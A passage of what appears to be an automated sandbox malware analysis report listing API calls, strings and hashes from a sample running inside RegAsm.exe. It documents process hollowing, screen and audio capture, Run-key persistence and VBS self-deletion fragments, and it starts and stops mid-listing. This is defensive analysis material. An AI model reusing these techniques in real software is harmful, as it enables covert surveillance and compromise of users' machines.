                                                                • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                • GetIconInfo.USER32(?,?), ref: 00418FF8
                                                                • DeleteObject.GDI32(?), ref: 00419027
                                                                • DeleteObject.GDI32(?), ref: 00419034
                                                                • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                • DeleteDC.GDI32(?), ref: 004191B7
                                                                • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                • GlobalFree.KERNEL32(?), ref: 00419283
                                                                • DeleteDC.GDI32(?), ref: 00419293
                                                                • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                • String ID: DISPLAY
                                                                • API String ID: 479521175-865373369
                                                                • Opcode ID: 7c8983c53be72e5ee4313047db9d93c3c673d7ce03baff72bd223da92b172140
                                                                • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                                • Opcode Fuzzy Hash: 7c8983c53be72e5ee4313047db9d93c3c673d7ce03baff72bd223da92b172140
                                                                • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                                • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                • ResumeThread.KERNEL32(?), ref: 00418470
                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                • GetLastError.KERNEL32 ref: 004184B5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`Mw$ntdll
                                                                • API String ID: 4188446516-1701449367
                                                                • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                                • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                                                APIs
                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                • ExitProcess.KERNEL32 ref: 0040D80B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                • API String ID: 1861856835-1447701601
                                                                • Opcode ID: d8e89e1965ce5ba2bf863528709aed873fcbb5ceb95d6d84e5684f15fc94d683
                                                                • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                                • Opcode Fuzzy Hash: d8e89e1965ce5ba2bf863528709aed873fcbb5ceb95d6d84e5684f15fc94d683
                                                                • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                                APIs
                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6CCF8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                • ExitProcess.KERNEL32 ref: 0040D454
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                                • API String ID: 3797177996-2483056239
                                                                • Opcode ID: ec0aa7fa51458eb6c40e0caf451084b880c625aab6ab7814cb26008928a5b4c2
                                                                • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                                • Opcode Fuzzy Hash: ec0aa7fa51458eb6c40e0caf451084b880c625aab6ab7814cb26008928a5b4c2
                                                                • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                                APIs
                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                                • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                                • API String ID: 2649220323-436679193
                                                                • Opcode ID: 4de65e87239deceda2419c6e22f4a35cea52a01b2b97f48f14606854e77c6627
                                                                • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                                • Opcode Fuzzy Hash: 4de65e87239deceda2419c6e22f4a35cea52a01b2b97f48f14606854e77c6627
                                                                • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                                APIs
                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                                • SetEvent.KERNEL32 ref: 0041B2AA
                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                                • CloseHandle.KERNEL32 ref: 0041B2CB
                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                • API String ID: 738084811-2094122233
                                                                • Opcode ID: e27b3f9eba018f8ca3c324594b7161069c0f951711efb11517c4a8cfdc535e62
                                                                • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                                • Opcode Fuzzy Hash: e27b3f9eba018f8ca3c324594b7161069c0f951711efb11517c4a8cfdc535e62
                                                                • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Write$Create
                                                                • String ID: RIFF$WAVE$data$fmt
                                                                • API String ID: 1602526932-4212202414
                                                                • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                                • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                • API String ID: 1646373207-255920310
                                                                • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                                • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 0040CE42
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                                                • _wcslen.LIBCMT ref: 0040CF21
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000), ref: 0040CFBF
                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                                • _wcslen.LIBCMT ref: 0040D001
                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D068
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                                • ExitProcess.KERNEL32 ref: 0040D09D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                                • API String ID: 1579085052-2309681474
                                                                • Opcode ID: 283c2ff4283ef6ea14c9631ac3abc3b8d6689ce6a044c306617b0cf23f9fad85
                                                                • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                                • Opcode Fuzzy Hash: 283c2ff4283ef6ea14c9631ac3abc3b8d6689ce6a044c306617b0cf23f9fad85
                                                                • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                                APIs
                                                                • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                                • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                                • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                                • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                                • _wcslen.LIBCMT ref: 0041C1CC
                                                                • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                                • GetLastError.KERNEL32 ref: 0041C204
                                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                                • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                                • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                                • GetLastError.KERNEL32 ref: 0041C261
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                • String ID: ?
                                                                • API String ID: 3941738427-1684325040
                                                                • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                                • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$EnvironmentVariable$_wcschr
                                                                • String ID:
                                                                • API String ID: 3899193279-0
                                                                • Opcode ID: 8496763b0818b5098030034dcc69127a0bf1f152158b2efe3c03734e132739af
                                                                • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                                • Opcode Fuzzy Hash: 8496763b0818b5098030034dcc69127a0bf1f152158b2efe3c03734e132739af
                                                                • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6CCF8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                • String ID: /stext "$0TG$0TG$NG$NG
                                                                • API String ID: 1223786279-2576077980
                                                                • Opcode ID: cd98076cbd31d0c1f17db76443358eb0b8c5969c5226cb19c20294b0481241c1
                                                                • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                                • Opcode Fuzzy Hash: cd98076cbd31d0c1f17db76443358eb0b8c5969c5226cb19c20294b0481241c1
                                                                • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                                                APIs
                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                • API String ID: 2490988753-744132762
                                                                • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                                • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                                                APIs
                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
